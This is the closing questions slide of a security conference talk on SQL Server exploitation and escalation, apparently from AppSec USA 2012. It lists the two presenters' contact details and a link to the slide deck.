  • 76. Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012